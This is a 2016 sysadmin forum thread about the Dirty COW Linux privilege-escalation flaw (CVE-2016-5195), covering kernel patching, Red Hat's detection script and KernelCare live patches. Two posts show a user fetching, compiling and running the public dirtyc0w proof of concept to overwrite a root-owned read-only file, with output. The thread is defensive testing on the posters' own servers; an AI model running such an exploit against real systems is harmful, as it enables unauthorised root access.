Join the community today
Become a Member

Security Kernel Security Update: Local Privilege Escalation CVE-2016-5195

Discussion in 'CentOS, Redhat & Oracle Linux News' started by eva2000, Oct 21, 2016.

  1. eva2000

    eva2000 Administrator Staff Member

    49,025
    11,232
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +17,483
    Local Time:
    2:09 PM
    Nginx 1.21.x
    MariaDB 10.x
  2. Matt

    Matt Well-Known Member

    889
    402
    63
    May 25, 2014
    Rotherham, UK
    Ratings:
    +643
    Local Time:
    5:09 AM
    1.5.15
    MariaDB 10.2
    Managed to get it to boot back into the installed kernel on the disk

    Code:
    [root@backup log]# yum remove kernel-firmware-2.6.32-642.6.1.el6.noarch dracut-kernel-004-409.el6_8.2.noarch kernel-2.6.32-642.6.1.el6.x86_64
    Loaded plugins: fastestmirror, priorities, security
    Setting up Remove Process
    Resolving Dependencies
    --> Running transaction check
    ---> Package dracut-kernel.noarch 0:004-409.el6_8.2 will be erased
    ---> Package kernel.x86_64 0:2.6.32-642.6.1.el6 will be erased
    ---> Package kernel-firmware.noarch 0:2.6.32-642.6.1.el6 will be erased
    --> Finished Dependency Resolution
    
    Dependencies Resolved
    
    ===================================================================================================================
     Package                       Arch                 Version                           Repository              Size
    ===================================================================================================================
    Removing:
     dracut-kernel                 noarch               004-409.el6_8.2                   @updates               202  
     kernel                        x86_64               2.6.32-642.6.1.el6                @updates               131 M
     kernel-firmware               noarch               2.6.32-642.6.1.el6                @updates                57 M
    
    Transaction Summary
    ===================================================================================================================
    Remove        3 Package(s)
    
    Installed size: 188 M
    Is this ok [y/N]: y
    Downloading Packages:
    Running rpm_check_debug
    Running Transaction Test
    Transaction Test Succeeded
    Running Transaction
      Erasing    : kernel-2.6.32-642.6.1.el6.x86_64                                                                1/3 
    warning:    erase unlink of /lib/modules/2.6.32-642.6.1.el6.x86_64/weak-updates failed: No such file or directory
    warning:    erase unlink of /lib/modules/2.6.32-642.6.1.el6.x86_64/modules.order failed: No such file or directory
    warning:    erase unlink of /lib/modules/2.6.32-642.6.1.el6.x86_64/modules.networking failed: No such file or directory
    warning:    erase unlink of /lib/modules/2.6.32-642.6.1.el6.x86_64/modules.modesetting failed: No such file or directory
    warning:    erase unlink of /lib/modules/2.6.32-642.6.1.el6.x86_64/modules.drm failed: No such file or directory
    warning:    erase unlink of /lib/modules/2.6.32-642.6.1.el6.x86_64/modules.block failed: No such file or directory
      Erasing    : kernel-firmware-2.6.32-642.6.1.el6.noarch                                                       2/3 
      Erasing    : dracut-kernel-004-409.el6_8.2.noarch                                                            3/3 
      Verifying  : kernel-2.6.32-642.6.1.el6.x86_64                                                                1/3 
      Verifying  : dracut-kernel-004-409.el6_8.2.noarch                                                            2/3 
      Verifying  : kernel-firmware-2.6.32-642.6.1.el6.noarch                                                       3/3 
    
    Removed:
      dracut-kernel.noarch 0:004-409.el6_8.2                       kernel.x86_64 0:2.6.32-642.6.1.el6                
      kernel-firmware.noarch 0:2.6.32-642.6.1.el6                
    
    Complete!
    [root@backup log]#
    
    Had to basically uninstall the standard kernels, as with those in place.......it won't boot?????
     
  3. eva2000

    eva2000 Administrator Staff Member

    49,025
    11,232
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +17,483
    Local Time:
    2:09 PM
    Nginx 1.21.x
    MariaDB 10.x
    that's a weird one then !
     
  4. Matt

    Matt Well-Known Member

    889
    402
    63
    May 25, 2014
    Rotherham, UK
    Ratings:
    +643
    Local Time:
    5:09 AM
    1.5.15
    MariaDB 10.2
    Yeah, I'm going to stop messing now. Any new servers will be installed with the default kernel going forward. Luckily none of my servers have limited user accounts on them (and the cPanel ones are all noshell), so this CVE shouldn't impact them.
     
  5. eva2000

    eva2000 Administrator Staff Member

    49,025
    11,232
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +17,483
    Local Time:
    2:09 PM
    Nginx 1.21.x
    MariaDB 10.x
    yeah... not being able to use ipset with ovh/sys grs kernels is enough to have me use distro default kernels to begin with :)
     
  6. Xon

    Xon Active Member

    173
    61
    28
    Nov 16, 2015
    Ratings:
    +229
    Local Time:
    12:09 PM
    1.15.x
    MariaDB 10.3.x
    Technically this affects any service account with normally limited rights. So if a php application is compromised but is running as a limited user, it could get root via privilege escalation.
     
  7. eva2000

    eva2000 Administrator Staff Member

    49,025
    11,232
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +17,483
    Local Time:
    2:09 PM
    Nginx 1.21.x
    MariaDB 10.x
    thanks for clarification

    seems if i read “Most serious” Linux privilege-escalation bug ever is under active exploit (updated) | Ars Technica again it mentions that
     
    Last edited: Oct 22, 2016
  8. eva2000

    eva2000 Administrator Staff Member

    49,025
    11,232
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +17,483
    Local Time:
    2:09 PM
    Nginx 1.21.x
    MariaDB 10.x
    Redhat has also posted a detection bash script for this vulnerability at https://access.redhat.com/sites/default/files/rh-cve-2016-5195_1.sh

    Code (Text):
    mkdir -p /root/tools
    cd /root/tools
    wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_1.sh
    chmod +x rh-cve-2016-5195_1.sh
    

    On standard CentOS 7.2 system
    Code (Text):
    ./rh-cve-2016-5195_1.sh
    Your kernel is 3.10.0-327.36.1.el7.x86_64 which IS vulnerable.
    Red Hat recommends that you update your kernel. Alternatively, you can apply partial
    mitigation described at https://access.redhat.com/security/vulnerabilities/2706661 .

    Seems elrepo mainline kernel isn't vulnerable. On my SoYouStart CentOS 7.2 + 4.7.5 Mainline linux kernel
    Code (Text):
    ./rh-cve-2016-5195_1.sh
    Your kernel is 4.7.5-1.el7.elrepo.x86_64 which is NOT vulnerable.

    On Linode with CentOS 6 or 7 with 4.8.3 provided kernel the detection test script doesn't work
    Code (Text):
    ./rh-cve-2016-5195_1.sh
    This script is only meant to detect vulnerable kernels on Red Hat Enterprise Linux 5, 6 and 7.
    


    seems the script just looks for vulnerable kernel versions rh-cve-2016-5195_1.sh · GitHub so elrepo 4.7.5 could still be vulnerable.
     
    Last edited: Oct 22, 2016
  9. eva2000

    eva2000 Administrator Staff Member

    49,025
    11,232
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +17,483
    Local Time:
    2:09 PM
    Nginx 1.21.x
    MariaDB 10.x
    Installed KernelCare on a CentOS 7 server as they have a 30 day free trial before needing to pay 30-Days Trial

    Code (Text):
    kcarectl --version
    2.8-3

    Code (Text):
    kcarectl --update
    Kernel is safe

    Code (Text):
    kcarectl --info
    kpatch-state: patch is applied
    kpatch-for: Linux version 3.10.0-327.36.1.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-4) (GCC) ) #1 SMP Sun Sep 18 13:04:29 UTC 2016
    kpatch-build-time: Fri Oct 21 13:23:56 2016
    kpatch-description: 3;3.10.0-327.36.2.el7.x86_64

    Code (Text):
    uname -r
    3.10.0-327.36.1.el7.x86_64
    

    Code (Text):
    kcare-uname -r
    3.10.0-327.36.2.el7.x86_64

    patched for the following
    Code (Text):
    kcarectl --patch-info | grep kpatch-cve
    kpatch-cve: CVE-2016-4581
    kpatch-cve-url: https://access.redhat.com/security/cve/cve-2016-4581
    kpatch-cve: CVE-2016-4581
    kpatch-cve-url: https://access.redhat.com/security/cve/cve-2016-4581
    kpatch-cve: CVE-2016-5829
    kpatch-cve-url: https://access.redhat.com/security/cve/CVE-2016-5829
    kpatch-cve: CVE-2016-7039
    kpatch-cve-url: https://access.redhat.com/security/cve/CVE-2016-7039
    kpatch-cve: CVE-2016-5195
    kpatch-cve-url: https://access.redhat.com/security/cve/cve-2016-5195
    kpatch-cve: CVE-2015-6937
    kpatch-cve-url: https://access.redhat.com/security/cve/CVE-2015-6937
    kpatch-cve: CVE-2015-7990
    kpatch-cve-url: https://access.redhat.com/security/cve/CVE-2015-7990
    kpatch-cve:
    kpatch-cve-url: http://googleprojectzero.blogspot.ru/2015/03/exploiting-dram-rowhammer-bug-to-gain.html

    Code (Text):
    kcarectl --patch-info
    OS: centos7
    kernel: kernel-3.10.0-327.36.1.el7
    time: 2016-10-21 09:46:25
    uname: 3.10.0-327.36.2.el7.x86_64
    
    kpatch-name: 3.10.0/fs-pnodec-treat-zero-mnt_group_id-s-as-unequal.patch
    kpatch-description: fs/pnode.c: treat zero mnt_group_id-s as unequal
    kpatch-kernel: >kernel-3.10.0-327.18.2.el7
    kpatch-cve: CVE-2016-4581
    kpatch-cvss: 4.7
    kpatch-cve-url: https://access.redhat.com/security/cve/cve-2016-4581
    kpatch-patch-url: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/patch/?id=7ae8fd0351f912b075149a1e03a017be8b903b9a
    
    kpatch-name: 3.10.0/propogate_mnt-handle-the-first-propogated-copy-being-a-slave.patch
    kpatch-description: propogate_mnt: Handle the first propogated copy being a slave
    kpatch-kernel: >kernel-3.10.0-327.18.2.el7
    kpatch-cve: CVE-2016-4581
    kpatch-cvss: 4.7
    kpatch-cve-url: https://access.redhat.com/security/cve/cve-2016-4581
    kpatch-patch-url: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/patch/?id=5ec0811d30378ae104f250bfc9b3640242d81e3f
    
    kpatch-name: 3.10.0/HID-hiddev-validate-num_values-for-HID.patch
    kpatch-description: HID: hiddev: validate num_values for HIDIOCGUSAGES,HIDIOCSUSAGES commands
    kpatch-kernel: >kernel-3.10.0-327.36.2.el7
    kpatch-cve: CVE-2016-5829
    kpatch-cvss: 6.9
    kpatch-cve-url: https://access.redhat.com/security/cve/CVE-2016-5829
    kpatch-patch-url: https://git.kernel.org/linus/93a2001bdfd5376c3dc2158653034c20392d15c5
    
    kpatch-name: 3.10.0/net-add-recursion-limit-to-GRO.patch
    kpatch-description: [net] add recursion limit to GRO
    kpatch-kernel: kernel-3.10.0-327.36.2.el7
    kpatch-cve: CVE-2016-7039
    kpatch-cvss: 7.1
    kpatch-cve-url: https://access.redhat.com/security/cve/CVE-2016-7039
    kpatch-patch-url: https://access.redhat.com/labs/psb/versions/kernel-3.10.0-327.36.2.el7/patches/net-add-recursion-limit-to-GRO
    
    kpatch-name: 3.10.0/0001-mm-remove-gup_flags-FOLL_WRITE-games-from-__get_user-327.patch
    kpatch-description: mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
    kpatch-kernel: >kernel-3.10.0-327.36.2.el7
    kpatch-cve: CVE-2016-5195
    kpatch-cvss: 6.9
    kpatch-cve-url: https://access.redhat.com/security/cve/cve-2016-5195
    kpatch-patch-url: https://git.kernel.org/linus/19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619
    
    kpatch-name: 3.10.0/RDS-verify-the-underlying-transport-exists-before-cr.patch
    kpatch-description: RDS: verify the underlying transport exists before creating a connection
    kpatch-kernel: >kernel-3.10.0-229.14.1.el7
    kpatch-cve: CVE-2015-6937
    kpatch-cvss: 7.1
    kpatch-cve-url: https://access.redhat.com/security/cve/CVE-2015-6937
    kpatch-patch-url: http://git.kernel.org/linus/74e98eb085889b0d2d4908f59f6e00026063014f
    
    kpatch-name: 3.10.0/RDS-fix-race-condition-when-sending-a-message-on.patch
    kpatch-description: RDS: fix race condition when sending a message on unbound socket
    kpatch-kernel: >kernel-3.10.0-229.14.1.el7
    kpatch-cve: CVE-2015-7990
    kpatch-cvss: 6.3
    kpatch-cve-url: https://access.redhat.com/security/cve/CVE-2015-7990
    kpatch-patch-url: https://lkml.org/lkml/2015/10/16/530
    
    kpatch-name: 3.10.0/proc-restrict-pagemap-access.patch
    kpatch-description: Restrict access to pagemap/kpageflags/kpagecount
    kpatch-kernel:
    kpatch-cve:
    kpatch-cvss:
    kpatch-cve-url: http://googleprojectzero.blogspot.ru/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
    kpatch-patch-url:
    
     
    Last edited: Oct 22, 2016
  10. eva2000

    eva2000 Administrator Staff Member

    49,025
    11,232
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +17,483
    Local Time:
    2:09 PM
    Nginx 1.21.x
    MariaDB 10.x
    hmm. this will affect all Android devices with affected linux kernels !!
     
  11. Matt

    Matt Well-Known Member

    889
    402
    63
    May 25, 2014
    Rotherham, UK
    Ratings:
    +643
    Local Time:
    5:09 AM
    1.5.15
    MariaDB 10.2
    I've just tested on the OVH kernel on my CentOS6 box (doesn't work):

    dirtycow.github.io/dirtyc0w.c at master · dirtycow/dirtycow.github.io · GitHub

    Code (Text):
    -bash-4.1$ cd /home/nginx/
    -bash-4.1$ ls
    dirtyc0w  dirtyc0w.c  domains  foo
    -bash-4.1$ ls -al
    total 32
    drwxr-s--- 3 nginx nginx 4096 Oct 22 16:43 .
    drwxr-xr-x 6 root  root  4096 Oct 22 04:01 ..
    -rwxr-xr-x 1 nginx nginx 9690 Oct 22 16:43 dirtyc0w
    -rw-r--r-- 1 root  nginx 2826 Oct 22 16:41 dirtyc0w.c
    drwxr-s--- 2 nginx nginx 4096 Oct 22 04:05 domains
    -r-----r-- 1 root  root    19 Oct 22 16:42 foo
    -bash-4.1$ ./dirtyc0w foo m00000000000000000
    mmap 6e7ca1408000
    
    procselfmem -100000000
    
    madvise 0
    
    -bash-4.1$ cat foo 
    this is not a test
    -bash-4.1$ 
    


    but does on a CentOS7 box
    Code (Text):
    [root@backup mattw]# wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
    --2016-10-22 17:47:18--  https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
    Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.60.133
    Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.60.133|:443... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 2826 (2.8K) [text/plain]
    Saving to: ‘dirtyc0w.c’
    
    100%[============================================================================================================>] 2,826       --.-K/s   in 0s      
    
    2016-10-22 17:47:18 (104 MB/s) - ‘dirtyc0w.c’ saved [2826/2826]
    
    [root@backup mattw]# echo this is not a test > foo
    [root@backup mattw]# chmod 0404 foo
    [root@backup mattw]# ls
    dirtyc0w.c  foo
    [root@backup mattw]# ls -al
    total 28
    drwx------. 2 mattw mattw 4096 Oct 22 17:47 .
    drwxr-xr-x. 3 root  root  4096 Oct 22 17:46 ..
    -rw-r--r--. 1 mattw mattw   18 Aug  2 18:00 .bash_logout
    -rw-r--r--. 1 mattw mattw  193 Aug  2 18:00 .bash_profile
    -rw-r--r--. 1 mattw mattw  231 Aug  2 18:00 .bashrc
    -rw-r--r--. 1 root  root  2826 Oct 22 17:47 dirtyc0w.c
    -r-----r--. 1 root  root    19 Oct 22 17:47 foo
    [root@backup mattw]# gcc -pthread dirtyc0w.c -o dirtyc0w
    [root@backup mattw]# su - mattw
    [mattw@backup ~]$ pwd
    /home/mattw
    [mattw@backup ~]$ ls
    dirtyc0w  dirtyc0w.c  foo
    [mattw@backup ~]$ ./dirtyc0w foo m00000000000000000
    mmap 7f19440d4000
    
    madvise 0
    
    procselfmem 1800000000
    
    [mattw@backup ~]$ cat foo
    m00000000000000000
    [mattw@backup ~]$
    
     
  12. eva2000

    eva2000 Administrator Staff Member

    49,025
    11,232
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +17,483
    Local Time:
    2:09 PM
    Nginx 1.21.x
    MariaDB 10.x
    interesting, there's more than one PoC for this flaw, so I believe this test you did is just on PoC ?
     
  13. Matt

    Matt Well-Known Member

    889
    402
    63
    May 25, 2014
    Rotherham, UK
    Ratings:
    +643
    Local Time:
    5:09 AM
    1.5.15
    MariaDB 10.2
    Just seen that CentOS5/6 have write_mem disabled, so that specific one won't work. Either way, the OVH kernel needs patching.
     
  14. eva2000

    eva2000 Administrator Staff Member

    49,025
    11,232
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +17,483
    Local Time:
    2:09 PM
    Nginx 1.21.x
    MariaDB 10.x
  15. Matt

    Matt Well-Known Member

    889
    402
    63
    May 25, 2014
    Rotherham, UK
    Ratings:
    +643
    Local Time:
    5:09 AM
    1.5.15
    MariaDB 10.2
    I've emailed my account manager @ OVH to see if he had any news on the issue (nothing on the OVH forums).
     
  16. Matt

    Matt Well-Known Member

    889
    402
    63
    May 25, 2014
    Rotherham, UK
    Ratings:
    +643
    Local Time:
    5:09 AM
    1.5.15
    MariaDB 10.2
    Actually, I made a mistake. The CentOS7 server I tested on was running the standard kernel :bag:

    CentOS7 and OVH kernel:

    Code (Text):
    [mattw@host ~]$ ls
    dirtyc0w  dirtyc0w.c  foo
    [mattw@host ~]$ cat foo
    this is not a test
    [mattw@host ~]$ ls -lah foo 
    -r-----r-- 1 root root 19 Oct 22 16:29 foo
    [mattw@host ~]$ ./dirtyc0w foo m00000000000000000
    mmap 60baa1179000
    
    procselfmem -100000000
    
    madvise 0
    
    [mattw@host ~]$ cat foo 
    this is not a test
    [mattw@host ~]$ uname -a
    Linux XXXXXXXXX 3.14.32-xxxx-grs-ipv6-64 #7 SMP Wed Jan 27 18:05:09 CET 2016 x86_64 x86_64 x86_64 GNU/Linux
    [mattw@host ~]$ cat /etc/redhat-release 
    CentOS Linux release 7.2.1511 (Core) 
    [mattw@host ~]$ 
    
     
  17. eva2000

    eva2000 Administrator Staff Member

    49,025
    11,232
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +17,483
    Local Time:
    2:09 PM
    Nginx 1.21.x
    MariaDB 10.x
    @Matt Flashpoint - Analysis of "DirtyCow" Kernel Exploit

     
  18. Matt

    Matt Well-Known Member

    889
    402
    63
    May 25, 2014
    Rotherham, UK
    Ratings:
    +643
    Local Time:
    5:09 AM
    1.5.15
    MariaDB 10.2
  19. eva2000

    eva2000 Administrator Staff Member

    49,025
    11,232
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +17,483
    Local Time:
    2:09 PM
    Nginx 1.21.x
    MariaDB 10.x
    excellent news for those using OVH custom grs kernels. Doesn't apply to me though as i use distro linux kernels for better module compatibility

     
  20. Sunka

    Sunka Well-Known Member

    1,150
    323
    83
    Oct 31, 2015
    Pula, Croatia
    Ratings:
    +521
    Local Time:
    6:09 AM
    Nginx 1.17.9
    MariaDB 10.3.22
    Nice.
    Installed also 30 days free account, updated and I hope that's it for this security bug.